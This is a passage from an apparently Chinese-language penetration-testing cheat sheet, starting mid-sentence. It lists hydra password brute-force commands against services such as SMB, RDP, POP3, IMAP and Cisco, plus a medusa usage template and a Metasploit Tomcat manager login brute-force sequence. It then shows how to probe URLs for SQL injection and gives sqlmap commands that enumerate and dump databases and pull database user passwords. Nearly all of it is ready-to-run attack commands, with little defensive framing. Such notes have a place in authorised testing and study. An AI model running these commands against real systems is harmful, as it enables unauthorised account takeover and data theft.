渗透测试的一些总结

花花世界蕾

中的内容是表示错误猜解的返回信息提示。）　　5、破解https：
　　hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
　　6、破解teamspeak：
　　hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
　　7、破解cisco：
　　hydra -P pass.txt 10.36.16.18 cisco
　　hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
　　8、破解smb：
　　hydra -l administrator -P pass.txt 10.36.16.18 smb
　　9、破解pop3：
　　hydra -l muts -P pass.txt my.pop3.mail pop3
　　10、破解rdp：
　　hydra ip rdp -l administrator -P pass.txt -V
　　11、破解http-proxy：
　　hydra -l admin -P pass.txt http-proxy://10.36.16.18
　　12、破解imap：
　　hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
　　hydra -C defaults.txt -6
　　Medusa暴力破解远程
　　kali linux自带破解工具，使用的时候要获得一些必要的信息。
　　1、目标IP地址
　　2、登录目标的一个用户名或者一个用户名文件（都是猜测的用户名也可以说是用户名字典）
　　3、密码字典
　　4、要验证的服务名称（比如ssh、http、telnet等）
　　使用命令：
　　medusa -h target_ip（攻击ip） -u username -P path_to_passwordlist（密码文件要打绝对路径） -M authentication_service_to_attack（要验证的服务名称）
　　-u是要攻击的目标的id（用户名）号，如果改为大写的U，将会是利用用户名列表进行攻击，-M参数后面接的是你要攻击的验证服务名称。
　　payload破解
　　search tomcat查看tomcat的payload
　　payload就是加载模块调用攻击的有效加载项。（真心抽象）
　　msfconsole回车
　　use auxiliary/scanner/http/tomcat_mgr_login 调用tomcat破解程序
　　show options 查看选项
　　set rhosts 127.0.0.1 设置要破解的IP地址（必须能ping通）
　　set rport 8080 设置端口
　　set username root 设置用户名（set user_file //.设置帐号字典）
　　set pass_file /root/.* 设置密码字典
　　set threads 50 设置线程50
　　run 开始执行。
　　sqlmap：数据库注入工具。
　　可以用来猜测数据库类型和利用漏洞渗透数据库
　　注入点一般存在登录页面、查找页面或添加页面等用户可以查找或修改数据的地方。
　　比如：最常用的寻找SQL注入点的方法，是在网站中寻找如下形式的页面链接：http://www.xxx.com/xxx.asp?id=YY
　　其中“YY”可能是数字，也有可能是字符串，分别被称为整数类型数据或者字符型数据。
　　一般有一下几种方法：
　　1、加 ' 法
　　浏览器可能会返回类似于下面的错误提示信息：Microsoft JET Database Engine 错误’80040e14表示有注入点。
　　2、and 1=1 和and 1=2 将and 1=1 写在url最后面访问显示正常，而and 1=2 提示错误说明有可能有注入点。如果两种方式结果一样，就表示没戏。
　　3、sqlmap下输入 (-u "域名" --level 5 --dbs) 猜测数据库类型
　　Sqlmap参数使用
　　BT5里面的话前面就要加python
　　sqlmap.py -u url --dbs //爆数据库
　　sqlmap.py -u url --current-db //爆当前库
　　sqlmap.py -u url --current-user //爆当前用户
　　sqlmap.py -u url --users 查看用户权限
　　sqlmap.py -u url --tables -D 数据库 //爆表段
　　sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
　　sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
　　sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段
　　加入python环境使用方法：
　　sqlmap.py -u url 判断
　　sqlmap.py -u url --is-dba -v 这是判断当前数据库的使用者是否是dba
　　sqlmap.py -u url --users -v 0 这句的目的是列举数据库的用户
　　sqlmap.py -u url --passwords -v 0这句的目的是获取数据库用户的密码
　　sqlmap.py -u url --privileges -v 0 这是判断当前的权限
　　sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
　　sqlmap.py -u url --tables -D '表' 爆表
　　sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列
　　sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
　　sqlmap.py -u url --dump -all -v 0 爆数据库
　　sqlmap.py -u url --users --password 爆用户名密码。